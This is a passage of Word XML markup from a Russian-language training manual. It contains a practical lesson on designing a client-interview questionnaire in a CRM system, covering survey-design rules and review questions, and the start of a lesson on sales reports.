        <w:t>3. Какие преимущества предоставляет владение информации о ваших клиентах?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc507788281"/>
      <w:bookmarkStart w:id="228" w:name="_Toc507788556"/>
      <w:bookmarkStart w:id="229" w:name="_Toc26278755"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 36</w:t>
      </w:r>
      <w:r w:rsidR="00DB3FFC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка анкеты для интервьюирования клиентов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков работы с клиентами. Разработка анкеты для интервьюирования клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964E54" w:rsidRPr="00617AC0" w:rsidRDefault="00964E54" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, CRM-система, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся изображения этапов работы с пояснениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Провести работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Зайти во вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Клиенты</w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используя интерфейс приложения добавить несколько клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить информацию у созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00B05EC8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>От того, как составлена ваша анкета, напрямую зависит результат исследования. Так, непонятная для респондентов анкета с неверно выстроенной логикой уменьшит количество заполнений и не принесет желаемого результата. В этой статье мы расскажем о том, как составить анкету правильно, чтобы она не только показалась респондентам интересной, но и смогла собрать информацию, на основе которой можно было бы сделать полезные выводы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Правила составления анкеты для опроса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определитесь с задачами предстоящего исследования. Именно их решению должны служить вопросы, последовательно задаваемые в вашей анкете.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: если перед вами стоит цель – узнать отношение покупателей к сотовым телефонам Samsung,задавайте вопросы об интерфейсе, технических характеристиках моделей, потребительских свойствах и пр. В данном случае вас не должно интересовать, в какое время вашему покупателю удобнее прийти за покупкой в салон N. У вас есть четкая цель – выяснить отношение к марке и вы должны ей следовать на протяжении всей анкеты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Поприветствуйте респондентов во вступлении к анкете, кратко опишите, с какой целью проводится опрос, при необходимости проинструктируйте, как нужно заполнять вашу анкету. По завершении анкетирования не забудьте поблагодарить опрошенного за потраченное время.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Составляйте грамотные, короткие и понятные вопросы. Давайте короткие и понятные варианты ответов к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Избегайте двойственности в вопросах – вас могут не так понять, это исказит результаты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Старайтесь предложить все возможные варианты ответа на вопрос и при необходимости поле </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>другое</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для свободного ответа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не допускайте орфографических ошибок. Грамотная анкета всегда говорит о серьезности компании, вызывает доверие к ней и уважение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример: Неправильный вопрос – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вы предпочитаете телефоны Samsung другим маркам из-за их удобного интерфейса или широкого набора приложений?</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Правильный вопрос – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дайте оценку потребительским свойствам телефонов Samsung(модель N)по 5-балльной шкале</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используйте минимум специальных терминов. Ваша анкета должна быть понятна максимальному кругу участников опроса. Нужно понимать, что эти люди не являются специалистами в вашей области. Если при составлении анкеты вы используете термины, поясняйте их. А лучше из вообще избегать. Чем более доступна анкета для понимания респондента, тем более охотно он на нее отвечает.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не делайте больше 3-х вопросов на одной странице. Это просто удобно для восприятия и располагает участника опроса к дальнейшему заполнению анкеты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Общее количество вопросов в анкете может быть самым разным – все зависит от задач и глубины проводимого исследования. Однако если анкета слишком большая, не забывайте вознаграждать респондентов за уделенное вам время – дарите фирменные сувениры, бонусные карты, просто оплачивайте им участие в вашем исследовании. Поверьте, это повысит лояльность к вашей компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обязательно следуйте логике при составлении анкеты. Правильная логика не вызовет недоумения и желания бросить заполнение вашей анкеты на полпути.</w:t>
      </w:r>
      <w:r w:rsidR="000641CB" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При составлении анкеты запросто запутаться с логикой. Будьте внимательны, задавая ветвления для вопросов. Обратите внимание, что ветвление направляется на страницу, поэтому вопрос, для которого задается ветвление, должен быть на странице один-единственный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следите за порядком вопросов. Расположенные в разной последовательности одни и те же вопросы могут давать различную информацию и даже искажать результаты исследования. Поэтому социологи и психологи при ответе на вопрос, как составить анкету правильно, советуют составлять вопросы от простых к сложным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Обязательно оставляйте для респондентов поля, дающие возможность высказать свое мнение: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ваши пожелания по улучшению работы магазина</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как Вы считаете..</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выскажите Ваше мнение по поводу…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Будьте аккуратны в выражениях и вежливы. Ничто в анкете не должно оскорблять, смущать или вызывать неприязнь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Протестируйте опрос. После составления анкеты просмотрите ее еще раз, уберите все лишние слова, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>засоряющие</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вопросы. Добейтесь четкости формулировок. Дайте заполнить анкету своим знакомым, коллегам, друзьям. Если они найдут в ней неточности, сбитую логику, скорректируйте анкету согласно рекомендациям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое интервьюирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Каких основных правил следует придерживаться при проведении интервьюирования?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Каких основных правил следует придерживаться при составлении вопросов анкеты?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc507788282"/>
      <w:bookmarkStart w:id="231" w:name="_Toc507788557"/>
      <w:bookmarkStart w:id="232" w:name="_Toc26278756"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 3</w:t>
      </w:r>
      <w:r w:rsidR="0079051C" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00DB3FFC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Формирование </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">статистических и </w:t>
      </w:r>
      <w:r w:rsidR="00DB3FFC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аналитических отчетов по продажам</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Формирование </w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">статистических и </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аналитических отчетов по продажам. Формирование навыков работы в CRM-системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, CRM-система, ресурсы сети интернет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Создать статистический отчет в CRM системе (пример создания содержится в теоретической части).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
